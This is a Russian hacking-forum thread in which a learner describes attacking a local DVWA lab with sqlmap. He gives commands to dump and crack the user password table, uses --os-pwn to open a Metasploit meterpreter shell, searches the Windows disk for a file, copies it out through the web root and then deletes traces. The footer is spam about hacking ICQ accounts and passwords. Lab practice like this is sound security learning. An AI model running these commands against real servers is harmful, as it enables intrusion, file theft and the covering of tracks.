Старый 10.01.2013, 20:23   #1
toorook
RAM 128MB
 
Аватар для toorook
 
Регистрация: 16.08.2011
Сообщений: 148
toorook на пути к лучшему
toorook вне форума

По умолчанию Вопросы по Sql-inj и Sqlmap.


Всем hi! Вот взялся изучать Sql-inj. Для "тренировочной" площадки взял DVWA. Пока все локально. Для поиска и эксплуатации использую SqlMap - мне эта тулза сразу приглянулась, что может и не правильно. Вроде получается - уровень low прошел.:comando::comando:

Но появились вопросы:
1. Могу ли я через sql-inj пробраться к файловой системе сервера. Мне не нужны файлы БД, надо файлы которые хранятся "где-то" на диске.
2. Могу ли я запустить через sql-inj запустить командную оболочку? Зачем? Чтоб создать пользователя и подключиться удаленно, для поиска того самого файла.

Или же все это бред:33: и веб-сервер не пустит меня дальше своей директории? Надо искать другую дырку...

Хз, может важно или вы подскажите что можно сообразить используя эти команды. Может их как-то изменить под задачи выше?

Узнать права юзера БД в системе:
Цитата:
root@root-K52JU:python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --is-dba -v 1
Сдампить и крякнуть пароли с БД:cj::
Цитата:
root@rot-K52JU: python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=nabh6k42t8rmmrpj7kf7118l80; security=low" -D dvwa -T users -C user,password --dump
__________________

  Ответить с цитированием
Последний раз редактировалось toorook; 12.01.2013 в 11:35.
Ответ: Вопросы по Sql-inj и Sqlmap.
Старый 12.01.2013, 12:46   #2
toorook
RAM 128MB
 
Аватар для toorook
 
Регистрация: 16.08.2011
Сообщений: 148
toorook на пути к лучшему
toorook вне форума
По умолчанию Ответ: Вопросы по Sql-inj и Sqlmap.

Итак, может кому пригодиться! По причене молчания форумчан в ответ на мой топик с вопросами, я решил не тратить времени и зделать все самостоятельно. Может кому из новичков будет интерестно - это не так сложно как кажеться. Все будет происходить на примере DVWA.

Задача:
Найти отпреденный файл, который храниться в неизвестном мне месте. Я почти знаю его имя

Разведка:
Ищу ошибки, подстваляя "кривые" значения. Не забываю посматривать на то, что отсылает мне web-сервер. Прислал куки. Бинго! Получил ошибку из id-1' .
Пробую sqlmap. Узнаю БД и юзера, плюс получаю "банер" - инфу о веб сервере.
Цитата:
sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=nabh6k42t8rmmrpj7kf7118l80; security=low" -b --current-db --current-user -v 1

Манипуляции с БД мне не интерестны. Иду дальше. Много часов безрезультатно потратив на поиск wed-shell и возможности его "залить", вспомнил что еще есть Metaspoloit!!!

Читаем мануaл для sqlmap!

Делаю следующие:
Цитата:
python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=cauegstbj88o6cgs8v17na3hv4; security=low" -v 1 --os-pwn
Ключ:
--os-pwn
Загрузка и выполнение полезной нагрузки в Metasploit

Вывод sqlmap:

Далее можно увидеть все по скринам:



Так, metasploit запустил полезную нагрузку meterpreter. Все становиться на много проще!))
Хочу запустить Cmd.exe - даю команду shell. Интерпритатор запустился, но вижу кракозябры, вместо нормального вывода. Ща исправим!


Даю команду
Цитата:
chcp 1251
Затем переключаю кодировочную сраницу у себя в термиле. Так значительней удобнее.
Осталось найти файл! Дело за малым! Даю команду:

Цитата:
DIR /b/s/a-d C:\SM0-*.jpg
Что делаю? Ищу фотку начинающиюся с SM0. Остальную часть имени я не помню. Запускаю и почти мгновенно файл найден!


Вот и все осталось получить его обратно! Наверно можно было бы и по другому но я решил его скопировать в рабочею директорию сайта и просто скачать через браузер!


Потом я конечно удаляю все найденные файлы с удаленного хоста и закрываю сессию meterpreter.

---------------------------------------------------------------------------------------
Ну вот как то так. Возможно есть и другие варианты решения этой задачи, но мне так было удобней. Т.к. я юзаю linux, я не знаю как sqlmap будет взаимодействовать с Metasploit'ом под Wndows. Хотя никто не запрещает использовать BackTrack. Жду ваших комментариев и очень надеюсь что это кому-то поможет (не только в атаке, но и в защите!).

Добавлено через 1 час 19 минут 54 секунды
Ссылочки в догонку поста:
DVWA - [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
Секреты Meterpreter Payload - [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
Sql-inj для начинающих - [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]

p.s.s. Эксплойтом 445 порта, хост не пробивался...
__________________

  Ответить с цитированием
Последний раз редактировалось toorook; 13.01.2013 в 18:49. Причина: Добавлено сообщение
Ответ

Метки
cmd.exe, sql-inj, sqlmap

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.



взломать аську аську взломать взлом программы сделать взлом программы как сделать взлом программы хакерские сайты как легко взломать аську лучшие хакерские сайты топ список хакерские сайты взлом паролей легкий взлом паролей

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd. Перевод: zCarot